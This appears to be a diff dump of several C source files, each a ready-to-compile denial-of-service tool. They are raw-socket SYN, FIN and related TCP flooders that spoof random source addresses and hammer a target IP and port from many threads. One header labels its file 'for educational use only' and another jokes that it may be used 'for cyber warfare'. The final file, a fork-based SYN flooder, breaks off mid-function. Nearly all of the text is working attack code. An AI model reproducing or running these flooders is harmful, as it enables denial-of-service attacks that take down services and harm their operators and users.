tcph->urg_ptr = 0;
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
char *td = (char *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
||||
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = htons(floodport);
|
||||
sin.sin_addr.s_addr = inet_addr(td);
|
||||
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_tcp_header(tcph);
|
||||
|
||||
tcph->dest = htons(floodport);
|
||||
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
||||
|
||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
||||
tcph->check = 0;
|
||||
tcph->check = tcpcsum(iph, tcph);
|
||||
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <port to be flooded> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
fprintf(stdout, "Setting up Sockets...\n");
|
||||
|
||||
int num_threads = atoi(argv[3]);
|
||||
floodport = atoi(argv[2]);
|
||||
int maxpps = atoi(argv[4]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
pthread_t thread[num_threads];
|
||||
|
||||
int multiplier = 20;
|
||||
|
||||
int i;
|
||||
for(i = 0;i<num_threads;i++){
|
||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
||||
}
|
||||
fprintf(stdout, "Starting Flood...\n");
|
||||
for(i = 0;i<(atoi(argv[5])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,185 @@
|
|||
#include <unistd.h>
|
||||
#include <time.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <pthread.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/in.h>
|
||||
#include <netinet/if_ether.h>
|
||||
#include <netdb.h>
|
||||
#include <net/if.h>
|
||||
#include <arpa/inet.h>
|
||||
|
||||
#define MAX_PACKET_SIZE 4096
|
||||
#define PHI 0x9e3779b9
|
||||
|
||||
static unsigned long int Q[4096], c = 362436;
|
||||
static unsigned int floodport;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
|
||||
void init_rand(unsigned long int x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
||||
}
|
||||
unsigned long int rand_cmwc(void)
|
||||
{
|
||||
unsigned long long int t, a = 18782LL;
|
||||
static unsigned long int i = 4095;
|
||||
unsigned long int x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int count)
|
||||
{
|
||||
register unsigned long sum = 0;
|
||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
|
||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
||||
struct tcp_pseudo{
|
||||
unsigned long src_addr;
|
||||
unsigned long dst_addr;
|
||||
unsigned char zero;
|
||||
unsigned char proto;
|
||||
unsigned short length;
|
||||
} pseudohead;
|
||||
|
||||
unsigned short total_len = iph->tot_len;
|
||||
pseudohead.src_addr=iph->saddr;
|
||||
pseudohead.dst_addr=iph->daddr;
|
||||
pseudohead.zero=0;
|
||||
pseudohead.proto=IPPROTO_TCP;
|
||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
||||
unsigned short *tcp = malloc(totaltcp_len);
|
||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
||||
unsigned short output = csum(tcp,totaltcp_len);
|
||||
free(tcp);
|
||||
|
||||
return output;
|
||||
}
|
||||
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = 6;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
|
||||
void setup_tcp_header(struct tcphdr *tcph)
|
||||
{
|
||||
tcph->source = htons(5678);
|
||||
tcph->seq = rand();
|
||||
tcph->ack_seq = 1;
|
||||
tcph->res2 = 1;
|
||||
tcph->doff = 5;
|
||||
tcph->syn = 1;
|
||||
tcph->window = htons(65535);
|
||||
tcph->check = 1;
|
||||
tcph->urg_ptr = 1;
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
char *td = (char *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
||||
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = htons(floodport);
|
||||
sin.sin_addr.s_addr = inet_addr(td);
|
||||
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_tcp_header(tcph);
|
||||
|
||||
tcph->dest = htons(floodport);
|
||||
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
||||
|
||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
||||
tcph->check = 0;
|
||||
tcph->check = tcpcsum(iph, tcph);
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <port to be flooded> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
fprintf(stdout, "Setting up Sockets...\n");
|
||||
|
||||
int num_threads = atoi(argv[3]);
|
||||
floodport = atoi(argv[2]);
|
||||
int maxpps = atoi(argv[4]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
pthread_t thread[num_threads];
|
||||
|
||||
int multiplier = 20;
|
||||
|
||||
int i;
|
||||
for(i = 0;i<num_threads;i++){
|
||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
||||
}
|
||||
fprintf(stdout, "Starting Flood...\n");
|
||||
sleep(atoi(argv[5]));
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,220 @@
|
|||
/*
|
||||
* For educational use only.
|
||||
*[Instructions]: Save as essyn.c | compile with : gcc essyn.c -pthread -o essyn |
|
||||
* This is released under the GNU GPL License v3.0, and is not allowed to be used for commercial products
|
||||
*/
|
||||
#include <unistd.h>
|
||||
#include <time.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <pthread.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/in.h>
|
||||
#include <netinet/if_ether.h>
|
||||
#include <netdb.h>
|
||||
#include <net/if.h>
|
||||
#include <arpa/inet.h>
|
||||
|
||||
#define MAX_PACKET_SIZE 4096
|
||||
#define PHI 0x9e3779b9
|
||||
|
||||
static unsigned long int Q[4096], c = 362436;
|
||||
static unsigned int floodport;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
|
||||
void init_rand(unsigned long int x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
||||
}
|
||||
unsigned long int rand_cmwc(void)
|
||||
{
|
||||
unsigned long long int t, a = 18782LL;
|
||||
static unsigned long int i = 4095;
|
||||
unsigned long int x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int count)
|
||||
{
|
||||
register unsigned long sum = 0;
|
||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
|
||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
||||
|
||||
struct tcp_pseudo
|
||||
{
|
||||
unsigned long src_addr;
|
||||
unsigned long dst_addr;
|
||||
unsigned char zero;
|
||||
unsigned char proto;
|
||||
unsigned short length;
|
||||
} pseudohead;
|
||||
unsigned short total_len = iph->tot_len;
|
||||
pseudohead.src_addr=iph->saddr;
|
||||
pseudohead.dst_addr=iph->daddr;
|
||||
pseudohead.zero=0;
|
||||
pseudohead.proto=IPPROTO_TCP;
|
||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
||||
unsigned short *tcp = malloc(totaltcp_len);
|
||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
||||
unsigned short output = csum(tcp,totaltcp_len);
|
||||
free(tcp);
|
||||
return output;
|
||||
}
|
||||
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = 6;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
|
||||
void setup_tcp_header(struct tcphdr *tcph)
|
||||
{
|
||||
tcph->source = htons(5678);
|
||||
tcph->seq = rand();
|
||||
tcph->ack_seq = 0;
|
||||
tcph->res2 = 0;
|
||||
tcph->doff = 5;
|
||||
tcph->syn = 1;
|
||||
tcph->window = htonl(65535);
|
||||
tcph->check = 0;
|
||||
tcph->urg_ptr = 0;
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
char *td = (char *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
||||
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = htons(floodport);
|
||||
sin.sin_addr.s_addr = inet_addr(td);
|
||||
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_tcp_header(tcph);
|
||||
|
||||
tcph->dest = htons(floodport);
|
||||
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
||||
|
||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
||||
tcph->check = 0;
|
||||
tcph->check = tcpcsum(iph, tcph);
|
||||
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <port to be flooded> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
fprintf(stdout, "Setting up Sockets...\n");
|
||||
|
||||
int num_threads = atoi(argv[3]);
|
||||
floodport = atoi(argv[2]);
|
||||
int maxpps = atoi(argv[4]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
pthread_t thread[num_threads];
|
||||
|
||||
int multiplier = 20;
|
||||
|
||||
int i;
|
||||
for(i = 0;i<num_threads;i++){
|
||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
||||
}
|
||||
fprintf(stdout, "Starting Flood...\n");
|
||||
for(i = 0;i<(atoi(argv[5])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,194 @@
|
|||
/*
|
||||
This is released under the GNU GPL License v3.0, and is allowed to be used for cyber warfare. ;)
|
||||
*/
|
||||
#include <unistd.h>
|
||||
#include <time.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <pthread.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/in.h>
|
||||
#include <netinet/if_ether.h>
|
||||
#include <netdb.h>
|
||||
#include <net/if.h>
|
||||
#include <arpa/inet.h>
|
||||
#define MAX_PACKET_SIZE 4096
|
||||
#define PHI 0x9e3779b9
|
||||
static unsigned long int Q[4096], c = 362436;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
void init_rand(unsigned long int x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
||||
}
|
||||
unsigned long int rand_cmwc(void)
|
||||
{
|
||||
unsigned long long int t, a = 18782LL;
|
||||
static unsigned long int i = 4095;
|
||||
unsigned long int x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int count)
|
||||
{
|
||||
register unsigned long sum = 0;
|
||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
||||
struct tcp_pseudo
|
||||
{
|
||||
unsigned long src_addr;
|
||||
unsigned long dst_addr;
|
||||
unsigned char zero;
|
||||
unsigned char proto;
|
||||
unsigned short length;
|
||||
} pseudohead;
|
||||
unsigned short total_len = iph->tot_len;
|
||||
pseudohead.src_addr=iph->saddr;
|
||||
pseudohead.dst_addr=iph->daddr;
|
||||
pseudohead.zero=0;
|
||||
pseudohead.proto=IPPROTO_TCP;
|
||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
||||
unsigned short *tcp = malloc(totaltcp_len);
|
||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
||||
unsigned short output = csum(tcp,totaltcp_len);
|
||||
free(tcp);
|
||||
return output;
|
||||
}
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = 6;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
void setup_tcp_header(struct tcphdr *tcph)
|
||||
{
|
||||
tcph->source = htons(5678);
|
||||
tcph->seq = rand();
|
||||
tcph->ack_seq = 1;
|
||||
tcph->res2 = 0;
|
||||
tcph->doff = 5;
|
||||
tcph->fin = 1;
|
||||
tcph->window = htons(65535);
|
||||
tcph->check = 0;
|
||||
tcph->urg_ptr = 0;
|
||||
}
|
||||
void *flood(void *par1)
|
||||
{
|
||||
char *td = (char *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = htons (rand() % 20480);
|
||||
sin.sin_addr.s_addr = inet_addr(td);
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, ":: cant open raw socket. got root?\n");
|
||||
exit(-1);
|
||||
}
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_tcp_header(tcph);
|
||||
tcph->dest = htons (rand() % 20480);
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, ":: motherfucking error.\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
||||
tcph->check = 0;
|
||||
tcph->check = tcpcsum(iph, tcph);
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 5){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <IP> <threads> <throttle, -1 for no throttle> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
int num_threads = atoi(argv[2]);
|
||||
int maxpps = atoi(argv[3]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
pthread_t thread[num_threads];
|
||||
int multiplier = 20;
|
||||
int i;
|
||||
for(i = 0;i<num_threads;i++){
|
||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
||||
}
|
||||
fprintf(stdout, ":: sending all the packets..\n");
|
||||
for(i = 0;i<(atoi(argv[4])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,191 @@
|
|||
#include <stdio.h>
|
||||
#include <netinet/in.h>
|
||||
#include <netdb.h>
|
||||
#include <sys/time.h>
|
||||
#include <sys/types.h>
|
||||
#include <unistd.h>
|
||||
#include <stdlib.h>
|
||||
#include <signal.h>
|
||||
#include <time.h>
|
||||
void usage();
|
||||
void getUserPriv();
|
||||
int getSrcPort();
|
||||
const char credit[] = "made by th3 $^N|)M^N, gr33tz to all!!!";
|
||||
struct packet {
|
||||
unsigned short ihl:4;
|
||||
unsigned short ver:4;
|
||||
unsigned char tos;
|
||||
unsigned short len;
|
||||
unsigned short id;
|
||||
unsigned short flag_offset;
|
||||
unsigned char ttl;
|
||||
unsigned char prot;
|
||||
unsigned short ipsum;
|
||||
unsigned long source;
|
||||
unsigned long dest;
|
||||
unsigned short sport;
|
||||
unsigned short dport;
|
||||
unsigned long seq;
|
||||
unsigned long ack_seq;
|
||||
unsigned char offset;
|
||||
unsigned char flags;
|
||||
unsigned short win;
|
||||
unsigned short tcpsum;
|
||||
unsigned short urgptr;
|
||||
char option[8];
|
||||
};
|
||||
|
||||
FILE *fp;
|
||||
|
||||
main(int argc, char * argv[]){
|
||||
getUserPriv(); //check user priv
|
||||
|
||||
if (argc < 5){
|
||||
usage(); //exit if argument failure
|
||||
}
|
||||
int tmp = 1;
|
||||
int forks = atoi(argv[3]);
|
||||
|
||||
/*forks defined here, depends on the number of threads user asked for.*/
|
||||
for (tmp = 0; tmp < forks; tmp++) fork();
|
||||
|
||||
int a1,a2,a3,a4;
|
||||
char a1s[20],a2s[20],a3s[20],a4s[20];
|
||||
|
||||
/*lets open da socket and define it be raw*/
|
||||
int sockd = socket(PF_INET, SOCK_RAW, 6);
|
||||
|
||||
/*call HDRINCL and let the kernel know we do the talking :)*/
|
||||
if (setsockopt (sockd, IPPROTO_IP, IP_HDRINCL, (char *)&tmp, sizeof (tmp)) < 0){
|
||||
printf("Error in setting HDRINCL");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
/*create packet struct */
|
||||
struct packet synp;
|
||||
bzero(&synp,sizeof(struct packet)); /*zero out the struct*/
|
||||
|
||||
/*init sin struct*/
|
||||
struct sockaddr_in sin;
|
||||
|
||||
/*take host port and convert to unsigned short*/
|
||||
unsigned short hport = atoi(argv[2]);
|
||||
int packets = atoi(argv[4]); //number of packets
|
||||
|
||||
if (packets == 0) packets = -1; //if user wants infinite, set packets to -1
|
||||
|
||||
int counter = 0; //counter for the while loop.
|
||||
|
||||
printf("Syn Flooding: %s at port: %s\n", argv[1],argv[2]);
|
||||
|
||||
while(counter != packets){
|
||||
synp.ihl = 5;
|
||||
synp.ver = 4;
|
||||
synp.len = htons(sizeof(struct packet));
|
||||
synp.flag_offset = 0;
|
||||
synp.prot = 6;
|
||||
synp.flags = 2;
|
||||
synp.ttl = 225;
|
||||
synp.offset = 112;
|
||||
synp.win = htons(65535);
|
||||
|
||||
synp.dport = htons(hport); //destination port...
|
||||
|
||||
//set packet options.
|
||||
synp.option[0] = 2;
|
||||
synp.option[1] = 4;
|
||||
synp.option[2] = 5;
|
||||
synp.option[3] = 0xB4;
|
||||
synp.option[4] = 1;
|
||||
synp.option[5] = 1;
|
||||
synp.option[6] = 4;
|
||||
synp.option[7] = 2;
|
||||
|
||||
synp.tcpsum = 0; //zero the sum for now...
|
||||
|
||||
register int count = (sizeof(struct packet)-20) >> 1,sum;
|
||||
register unsigned short *p = &synp.sport;
|
||||
|
||||
int srcp = getSrcPort(); //generate random port.
|
||||
|
||||
//Generate Random Ip for src
|
||||
a1 = (int)((rand()%(255-10+1)) + 10);
|
||||
a2 = (int)((rand()%(255-10+1)) + 10);
|
||||
a3 = (int)((rand()%(255-10+1)) + 10);
|
||||
a4 = (int)((rand()%(255-10+1)) + 10);
|
||||
|
||||
sprintf(a1s, "%d", a1);
|
||||
sprintf(a2s, "%d", a2);
|
||||
sprintf(a3s, "%d", a3);
|
||||
sprintf(a4s, "%d", a4);
|
||||
|
||||
